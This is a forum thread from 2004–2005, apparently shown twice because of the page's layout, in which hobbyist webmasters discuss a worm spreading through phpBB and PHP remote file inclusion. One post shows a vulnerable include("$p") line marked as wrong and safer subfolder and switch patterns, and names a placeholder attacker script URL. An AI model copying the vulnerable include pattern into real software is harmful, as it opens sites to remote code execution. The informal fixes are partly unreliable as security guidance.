phpBB Warning - Page 6

H · December 28th, 2004, 3:03 PM

Ok, I read through the sites, and it seems that's it's really nothing new. All to do with security with Includes and Require. What it does, it uses and dynamic includes (or requires) to execute a remote script, infecting your site and the server.

Prevention for user made scripts:
Validate URL variables.

I had prevented this in the very beginning by putting includes in a subfolder, then checking to see if the file exists. And since http://scriptkiddies.org/evilscript.php can't exist in a subfolder on my site, no way for it to execute.

Prevention for third party made scripts:
Update to the latest versions and keep tabs on their sites for any further updates.

As big applications like this is are used by hundreds, or even thousands of people, they're the big targets. Update them as soon as possible.

If I seemed to have misinterpted the prevent or cause, please let the community know of the appropriate action to take to prevent this.

**David** · December 28th, 2004, 4:53 PM

Haugland...can you explain that a little simpler please? Being php stupid, it sort of went over my head a bit lol Basically, can you give an example of "wrong" and "right"?

H · December 28th, 2004, 5:17 PM

Sure thing, I guess I didn't think about whether people would understand or not.

WRONG

Code:

include("$p");

RIGHT

Code:

include("somefolder/$p.php");

And of course, using a SWITCH method is always great too.

Code:

switch ($p) {
case "apple":
   include("apple.php");
   break;
case "bar":
   include("bar.php");
   break;
}

More SWITCH info at http://ca3.php.net/switch

**David** · December 28th, 2004, 5:48 PM

ah, that's cool. i get it now. it's probably not that "people" wouldn't understand...just me lol. I just woke up about an hour ago so my brain is still getting started.

is it just variables like that? or could it end up being included files as well?

H · December 28th, 2004, 5:55 PM

Yeah, the whole tired thing is something we can all share.

I think it's just variables.
Like if you do

Code:

include("connect.php");

There's no way it could be manipulated.

Fortunately when I did teaching, I told the kids to use a subfolder. Who knows if they actually listened though.

Anyhow, if a real PHP expert could let us know any additional information, that would be great.

Ravn_wolf · January 21st, 2005, 5:25 PM

I'm dying here! Ok, I really can't update my phpbb right now. I have like no time. Plus, I'm in a very panicking mode because I've never updated the thing, and I'm afraid I'm going to mess up on the first try. Trust me, I'm an expert on that.

But I found this topic about the matter:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Will it be enough for now?

Einstein · January 22nd, 2005, 10:19 AM

Quote:

Originally Posted by Ravn_wolf

But I found this topic about the matter:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Will it be enough for now?

Yes, it's enough to keep the worm out of your board. It's exactly that exploit it's using.

Ravn_wolf · January 22nd, 2005, 6:11 PM

Thanks!
I already upgraded the boards anyway. I was afraid I was not going to have enough enough time to do it next week. And since my paranoia was gone, I was able to remember that I could upgrade the forums not just manually *aplause*.

Anyway, thanks for telling that this was enough to keep the worm out. I was arguing before with two of my users. They were telling everyone that the boards were unsafe because I wasn't upgrading the forums. I told them what I did with the script, and they don't seem to believe it.
Now I just think they just wanted to cause mayhem.

**Partsking** · March 4th, 2005, 12:38 PM

All phpBB Admins should upgrade to the latest version, 2.0.13. It has a nice little feature in your admin panel that will check your current version and tell you if there's an update. It also fixes a critical issue in .12.

As always, keep your version updated!

December 28th, 2004, 5:17 PM	#48 (permalink)
H after g, before i Resident. Joined in Jul 2004 Lives in N,BC,CA 8,087 posts Gave thanks: 48 Thanked 131 times	Sure thing, I guess I didn't think about whether people would understand or not. WRONG Code: include("$p"); RIGHT Code: include("somefolder/$p.php"); And of course, using a SWITCH method is always great too. Code: switch ($p) { case "apple": include("apple.php"); break; case "bar": include("bar.php"); break; } More SWITCH info at http://ca3.php.net/switch

December 28th, 2004, 5:55 PM	#50 (permalink)
H after g, before i Resident. Joined in Jul 2004 Lives in N,BC,CA 8,087 posts Gave thanks: 48 Thanked 131 times	Yeah, the whole tired thing is something we can all share. I think it's just variables. Like if you do Code: include("connect.php"); There's no way it could be manipulated. Fortunately when I did teaching, I told the kids to use a subfolder. Who knows if they actually listened though. Anyhow, if a real PHP expert could let us know any additional information, that would be great.

March 4th, 2005, 12:38 PM	#54 (permalink)
Partsking Surpass Fan Comfy Contributor Joined in Dec 2003 Lives in South Carolina Hosted on Mecca 172 posts Gave thanks: 0 Thanked 0 times	All phpBB Admins should upgrade to the latest version, 2.0.13. It has a nice little feature in your admin panel that will check your current version and tell you if there's an update. It also fixes a critical issue in .12. As always, keep your version updated! __________________ Server: Mecca Site: Lonaf.com Co-winner 2004 Surpassies - Most Helpful About me: Ford Parts Manager, Moderator at Trekbbs.com, Owner of Lonaf.com. Love golf, Love Miller Lite and Love my wife and kids.

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search

December 28th, 2004, 3:03 PM	#46 (permalink)
H after g, before i Resident. Joined in Jul 2004 Lives in N,BC,CA 8,087 posts Gave thanks: 48 Thanked 131 times	Ok, I read through the sites, and it seems that's it's really nothing new. All to do with security with Includes and Require. What it does, it uses and dynamic includes (or requires) to execute a remote script, infecting your site and the server. Prevention for user made scripts: Validate URL variables. I had prevented this in the very beginning by putting includes in a subfolder, then checking to see if the file exists. And since http://scriptkiddies.org/evilscript.php can't exist in a subfolder on my site, no way for it to execute. Prevention for third party made scripts: Update to the latest versions and keep tabs on their sites for any further updates. As big applications like this is are used by hundreds, or even thousands of people, they're the big targets. Update them as soon as possible. If I seemed to have misinterpted the prevent or cause, please let the community know of the appropriate action to take to prevent this.

January 21st, 2005, 5:25 PM	#51 (permalink)
Ravn_wolf Registered User Fresh Surpasser Joined in Oct 2004 15 posts Gave thanks: 0 Thanked 0 times	I'm dying here! Ok, I really can't update my phpbb right now. I have like no time. Plus, I'm in a very panicking mode because I've never updated the thing, and I'm afraid I'm going to mess up on the first try. Trust me, I'm an expert on that. But I found this topic about the matter: http://www.phpbb.com/phpBB/viewtopic.php?t=240513 Will it be enough for now?

January 22nd, 2005, 6:11 PM	#53 (permalink)
Ravn_wolf Registered User Fresh Surpasser Joined in Oct 2004 15 posts Gave thanks: 0 Thanked 0 times	Thanks! I already upgraded the boards anyway. I was afraid I was not going to have enough enough time to do it next week. And since my paranoia was gone, I was able to remember that I could upgrade the forums not just manually aplause. Anyway, thanks for telling that this was enough to keep the worm out. I was arguing before with two of my users. They were telling everyone that the boards were unsafe because I wasn't upgrading the forums. I told them what I did with the script, and they don't seem to believe it. Now I just think they just wanted to cause mayhem.

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)